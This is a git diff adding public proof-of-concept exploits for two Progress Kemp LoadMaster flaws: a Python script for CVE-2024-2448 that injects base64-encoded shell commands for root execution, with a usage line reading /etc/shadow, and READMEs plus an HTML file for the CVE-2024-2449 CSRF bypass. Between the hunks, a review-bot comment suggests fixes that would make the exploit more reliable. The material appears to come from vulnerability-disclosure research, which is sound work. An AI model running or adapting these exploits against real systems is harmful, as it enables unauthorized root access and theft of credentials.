diff --git a/CVE-2024-2448/CVE-2024-2448.py b/CVE-2024-2448/CVE-2024-2448.py new file mode 100644 index 0000000..b4cd8be --- /dev/null +++ b/CVE-2024-2448/CVE-2024-2448.py @@ -0,0 +1,60 @@ +# Exploit for CVE-2024-2448: authenticated command injection in Progress Kemp LoadMaster +# Tested on: LoadMaster 7.2.59.2 +# Author: Dave Yesland @daveysec with Rhino Security Labs + +import argparse +import base64 +import requests +import urllib3 +from urllib3.exceptions import InsecureRequestWarning + +# Suppress only the InsecureRequestWarning from urllib3 +urllib3.disable_warnings(InsecureRequestWarning) + + +def get_headers(host, sessionid): + return { + 'Cookie': f'SESSIONID={sessionid}', + 'Referer': f'{host}/progs/' + } + + +def cleanup(cookie, host): + cleanup_cmd = 'sed -i "s/.*blahblah.*//g" /tmp/rrd/hist_graphs.env' + cleanup_cmd = f"$({cleanup_cmd})" + encoded_cmd = base64.b64encode(cleanup_cmd.encode()).decode() + url = f"{host}/progs/hg_cfg/add_rs/{encoded_cmd}" + requests.get(url, headers=get_headers(host, cookie), verify=False) + + +def exec_command(cmd, cookie, host): + cmd = f"$({cmd} 1>&2)" + encoded_cmd = base64.b64encode(cmd.encode()).decode() + url = f"{host}/progs/hg_cfg/add_rs/{encoded_cmd}" + response = requests.get(url, headers=get_headers(host, cookie), verify=False, proxies={"https":"http://192.168.0.11:8080"}) + print(get_cmd_output(response.text)) + cleanup(cookie, host) + + +def get_cmd_output(html_content): + start_tag = '
' + end_tag = '
' + start_index = html_content.find(start_tag) + len(start_tag) + end_index = html_content.find(end_tag, start_index) + extracted_content = html_content[start_index:end_index].strip() + return extracted_content + + +def main(): + parser = argparse.ArgumentParser() + parser.add_argument('--url', type=str, help='https://HOST:PORT', required=True) + parser.add_argument('--cookie', type=str, help='Session cookie', required=True) + parser.add_argument('--cmd', type=str, help='Command to execute', required=True) + + args = parser.parse_args() + + exec_command(args.cmd, args.cookie, args.url) + + +if __name__ == "__main__": + main() diff --git a/CVE-2024-2448/README.md b/CVE-2024-2448/README.md new file mode 100644 index 0000000..846d5bb --- /dev/null +++ b/CVE-2024-2448/README.md @@ -0,0 +1,21 @@ +# CVE-2024-2448: Authenticated Command Injection in Progress Kemp LoadMaster + +## Information +**Description:** This allows authenticated command execution as root on LoadMaster load balancers. +**Versions Affected:** LoadMaster 7.2.59.2 +**Version Fixed:** See Vendor Advisory +**Researcher:** Dav Yesland (https://twitter.com/daveysec) +**Disclosure Link:** https://rhinosecuritylabs.com/research/cve-2024-2448-kemp-loadmaster/ +**NIST CVE Link:** https://nvd.nist.gov/vuln/detail/CVE-2024-2448 +**Vendor Advisory:** https://support.kemptechnologies.com/hc/en-us/articles/25119767150477-LoadMaster-Security-Vulnerabilities-CVE-2024-2448-and-CVE-2024-2449 +## Proof-of-Concept Exploit +### Description +This exploits an authenticated (with any permission settings) command injection in LoadMaster where user input is executed by an eval statement. + +### Usage/Exploitation +``` +python3 CVE-2024-2448.py --url 'https://LM_HOST:8443' --cookie 'AUTH_COOKIE' --cmd 'cat /etc/shadow' +``` + +### Screenshot +![Alt-text that shows up on hover](poc_image.png) \ No newline at end of file 
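Review bot: `exec_command` hard-codes `proxies={"https":"http://192.168.0.11:8080"}` in its `requests.get` call, which reads like a leftover interception-proxy setting from development; for anyone without a listener at that address every request fails with a connection error, so the kwarg should be dropped or exposed as an optional `--proxy` argument, e.g. `response = requests.get(url, headers=get_headers(host, cookie), verify=False, timeout=30)`. A `timeout` belongs on the `requests.get` in `cleanup` as well, because an injected command that blocks on the appliance would otherwise hang the script indefinitely. In `get_cmd_output`, `html_content.find(start_tag)` returning -1 is not handled, so a response without the marker yields a misleading slice instead of an empty result; a guard such as `if html_content.find(start_tag) == -1: return ""` before the slicing makes that failure visible (the marker literals themselves appear to have been stripped from this rendering of the hunk, so I cannot confirm what they are). Lastly, the `cleanup` sed pattern `blahblah` does not occur in the command string `exec_command` injects, so unless the appliance itself writes that token into `/tmp/rrd/hist_graphs.env` the cleanup looks like a no-op that merely adds one more injected entry — worth confirming against the disclosure and documenting in a comment above `cleanup`.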
diff --git a/CVE-2024-2448/poc_image.png b/CVE-2024-2448/poc_image.png new file mode 100644 index 0000000..df302a9 Binary files /dev/null and b/CVE-2024-2448/poc_image.png differ diff --git a/CVE-2024-2449/README.md b/CVE-2024-2449/README.md new file mode 100644 index 0000000..8c807fc --- /dev/null +++ b/CVE-2024-2449/README.md @@ -0,0 +1,20 @@ +# CVE-2024-2449: Cross-Site Requets Forgery in Progress Kemp LoadMaster + +## Information +**Description:** This demonstrates a bypass in the CSRF protections of the Progress Kemp LoadMaster WUI. +**Versions Affected:** 7.2.59.2 +**Version Fixed:** See vendor advisory. +**Researcher:** Dave Yesland (https://twitter.com/daveysec) +**Disclosure Link:** https://rhinosecuritylabs.com/research/cve-2024-2448-kemp-loadmaster/ +**NIST CVE Link:** https://nvd.nist.gov/vuln/detail/CVE-2024-2449 +**Vendor Disclosure** https://support.kemptechnologies.com/hc/en-us/articles/25119767150477-LoadMaster-Security-Vulnerabilities-CVE-2024-2448-and-CVE-2024-2449 + +## Proof-of-Concept Exploit +### Description +This bypasses CSRF protections by serving the HTML file from the same directory as the targeted WUI page and including the referer. This bypasses the regex checks of the Referer header. + +### Usage/Exploitation +Serve the HTML file from the `/progs/hg_cfg` directory. + +### Screenshot +![Alt-text that shows up on hover](poc_image.gif) \ No newline at end of file diff --git a/CVE-2024-2449/poc_image.gif b/CVE-2024-2449/poc_image.gif new file mode 100644 index 0000000..55b7c86 Binary files /dev/null and b/CVE-2024-2449/poc_image.gif differ diff --git a/CVE-2024-2449/progs/hg_cfg/CVE-2024-2449.html b/CVE-2024-2449/progs/hg_cfg/CVE-2024-2449.html new file mode 100644 index 0000000..30b6066 --- /dev/null +++ b/CVE-2024-2449/progs/hg_cfg/CVE-2024-2449.html @@ -0,0 +1,30 @@ + + + + + + + +
+
+ + + + + \ No newline at end of file